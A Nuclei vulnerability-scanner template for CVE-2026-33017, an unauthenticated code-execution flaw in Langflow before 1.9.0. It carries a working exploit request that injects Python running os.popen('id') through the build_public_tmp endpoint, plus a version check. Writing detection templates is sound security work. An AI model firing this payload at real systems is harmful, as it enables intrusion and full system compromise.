id: CVE-2026-33017

info:
  name: Langflow < 1.9.0 - Remote Code Execution
  author: himind
  severity: critical
  description: |
    Langflow versions prior to 1.9.0 are vulnerable to unauthenticated remote code execution (RCE) via the build_public_tmp endpoint. Attackers can submit a manipulated flow JSON containing Python code that is executed during the build process without proper sandboxing.
  impact: |
    Remote attackers can execute arbitrary Python code without authentication, leading to full system compromise.
  remediation: |
    Update to version 1.9.0 or later.
  reference:
    - https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html
    - https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33017
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-33017
    epss-score: 0.23981
    epss-percentile: 0.96135
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
    vendor: langflow
    product: langflow
    shodan-query: http.favicon.hash:1727196746
  tags: cve,cve2026,langflow,rce,ai,passive,kev,vkev

variables:
  uuid: "{{uuid}}"

flow: http(1) || http(2)

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/v1/build_public_tmp/{{uuid}}/flow"
    body: |
      {
        "data": {
          "nodes": [
            {
              "data": {
                "node": {
                  "template": {
                    "code": {
                      "value": "def function():\n import os\n return os.popen('id').read()"
                    }
                  }
                }
              }
            }
          ]
        }
      }
    headers:
      Content-Type: application/json
    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'regex("uid=[0-9]+.*gid=[0-9]+.*", body)'
          - 'contains(body, "xmsg\":")'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/version"
    matchers:
      - type: dsl
        dsl:
          - "compare_versions(version, '< 1.9.0')"
          - "status_code == 200"
        condition: and
    extractors:
      - type: json
        name: version
        json:
          - ".version"
        internal: true
# digest: 490a004630440220583f7f6298207ff452c3875370b12d0150b79c2a8b3d6e354b5e768a9d63dccd02202ad0fe5aa02581f2e0984766e9eff1702046cbf6c43a7574e81152a097ed00f3:922c64590222798bb761d5b6d8e72950